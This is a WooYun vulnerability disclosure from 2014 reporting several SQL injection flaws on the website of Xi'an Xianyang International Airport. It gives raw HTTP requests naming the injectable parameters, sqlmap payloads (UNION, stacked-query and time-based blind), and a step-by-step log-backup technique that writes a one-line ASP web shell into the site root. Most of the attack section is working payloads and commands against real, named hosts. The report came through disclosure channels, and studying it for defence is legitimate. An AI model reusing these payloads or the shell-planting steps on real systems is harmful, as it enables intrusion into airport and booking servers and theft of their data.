当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-060559

漏洞标题:西安咸阳机场多个sql注射导致getshell

相关厂商:西安咸阳国际机场

漏洞作者: Kuuki

提交时间:2014-05-16 16:22

修复时间:2014-06-30 16:23

公开时间:2014-06-30 16:23

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-16: 细节已通知厂商并且等待厂商处理中
2014-05-21: 厂商已经确认,细节仅向厂商公开
2014-05-31: 细节向核心白帽子及相关领域专家公开
2014-06-10: 细节向普通白帽子公开
2014-06-20: 细节向实习白帽子公开
2014-06-30: 细节向公众公开

简要描述:

旁站还有一个购物站点 一并沦陷

详细说明:

注射点(f_*参数均存在注入):

POST /m/departures.aspx HTTP/1.0
Cookie: ASPSESSIONIDSQRRDCTD=IDFNMEAAKMLFOOMPBIBNIJIA; ASP.NET_SessionId=bwenolejqript345usfe1c55
Content-Length: 128
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET4.0C; .NET4.0E; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: www.xxia.com
Content-Type: application/x-www-form-urlencoded
Referer: http://www.xxia.com/m/departures.aspx
f_txtFlightNumber=9876543210&f_txtTerminus=%E7%9B%AE%E7%9A%84%E5%9C%B0&f_txtAirline=%E8%88%AA%E7%A9%BA%E5%85%AC%E5%8F%B8&x=0&y=0


sqlmap报告

---
Place: POST
Parameter: f_txtFlightNumber
Type: UNION query
Title: Generic UNION query (NULL) - 23 columns
Payload: f_txtFlightNumber=9876543210' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(121)+CHAR(106)+CHAR(108)+CHAR(113)+CHAR(104)+CHAR(66)+CHAR(81)+CHAR(72)+CHAR(75)+CHAR(78)+CHAR(88)+CHAR(112)+CHAR(120)+CHAR(101)+CHAR(113)+CHAR(117)+CHAR(98)+CHAR(105)+CHAR(113)-- &f_txtTerminus=%E7%9B%AE%E7%9A%84%E5%9C%B0&f_txtAirline=%E8%88%AA%E7%A9%BA%E5%85%AC%E5%8F%B8&x=0&y=0
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: f_txtFlightNumber=9876543210'; WAITFOR DELAY '0:0:5'--&f_txtTerminus=%E7%9B%AE%E7%9A%84%E5%9C%B0&f_txtAirline=%E8%88%AA%E7%A9%BA%E5%85%AC%E5%8F%B8&x=0&y=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: f_txtFlightNumber=9876543210' WAITFOR DELAY '0:0:5'--&f_txtTerminus=%E7%9B%AE%E7%9A%84%E5%9C%B0&f_txtAirline=%E8%88%AA%E7%A9%BA%E5%85%AC%E5%8F%B8&x=0&y=0
---
[14:31:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008


GETSHELL方法:

日志差异备份 -   1.恢复当前库
注入点;alter database db_airport set RECOVERY FULL--+
2.创建表cmd
注入点;create table cmd (a image)--+
3.备份当前库到c:\sql.bak
注入点;backup log 当前库 to disk = 'c:\sql.bak' with init--+
4.插入一句话代码到创建的表cmd
注入点;insert into cmd (a) values ('<%execute(request("a"))%>')--+
5.备份一句话代码到站点根目录
注入点;backup log db_airport to disk = 'E:\wwwroot\website\104.asp'--+
6.完成
注入点;drop table cmd--+


 2014-05-13 下午4.12.21.png


 2014-05-13 下午4.12.33.png


旁站购物站:http://booking.xxia.com/ 在同一个服务器
其余注入:

POST /m/arrivals.aspx HTTP/1.0
Cookie: ASPSESSIONIDSQRRDCTD=IDFNMEAAKMLFOOMPBIBNIJIA; ASP.NET_SessionId=bwenolejqript345usfe1c55
Content-Length: 129
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET4.0C; .NET4.0E; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: www.xxia.com
Content-Type: application/x-www-form-urlencoded
Referer: http://www.xxia.com/m/arrivals.aspx
f_txtFlightNumber=9876543210&f_txtDeparture=%E5%87%BA%E5%8F%91%E5%9C%B0&f_txtAirline=%E8%88%AA%E7%A9%BA%E5%85%AC%E5%8F%B8&x=0&y=0


Insert型:

POST /poll.aspx?q=submit HTTP/1.0
Cookie: ASPSESSIONIDSQRRDCTD=IDFNMEAAKMLFOOMPBIBNIJIA; ASP.NET_SessionId=bwenolejqript345usfe1c55
Content-Length: 649
Accept: */*
Host: www.xxia.com
Content-Type: application/x-www-form-urlencoded
Referer: http://www.xxia.com/poll.aspx
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET4.0C; .NET4.0E; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
h_txt226=%E6%82%A8%E8%AE%A4%E4%B8%BA%E5%92%B8%E9%98%B3%E6%9C%BA%E5%9C%BA%E7%9B%AE%E5%89%8D%E6%9C%80%E9%9C%80%E6%8F%90%E5%8D%87%E7%9A%84%E6%9C%8D%E5%8A%A1%E6%98%AF%EF%BC%9A&txt226=1234&h_txt227=%E6%82%A8%E8%AE%A4%E4%B8%BA%E5%92%B8%E9%98%B3%E6%9C%BA%E5%9C%BA%E5%93%AA%E6%96%B9%E4%BE%BF%E6%9C%8D%E5%8A%A1%E8%AE%A9%E6%82%A8%E6%9C%80%E4%B8%BA%E8%AE%A4%E5%8F%AF%EF%BC%9A&txt227=1234&uname=&uemail=test%40altoromutual.com&uqq=1234&uphone=555-555-5555&item160=201&item60=61&item141=142&item153=165&item161=206&item81=82&item162=211&item111=112&item123=124&item135=136&item147=148&item159=195&item163=216&item63=64&item87=88&item156=180&item164=221&item72=73


参数cid:

GET /m/business.aspx?q=shoppinglist&cid=615


站点已经被别人上传有大马了,在web备份目录还可以找到
另外服务器处于内网,与多个查询接口相连,被恶意利用后果可想而知

漏洞证明:

 2014-05-13 下午4.35.30.png

修复方案:

过滤

版权声明:转载请注明来源 Kuuki@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-05-21 14:30

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给陕西分中心处置。

最新状态:

暂无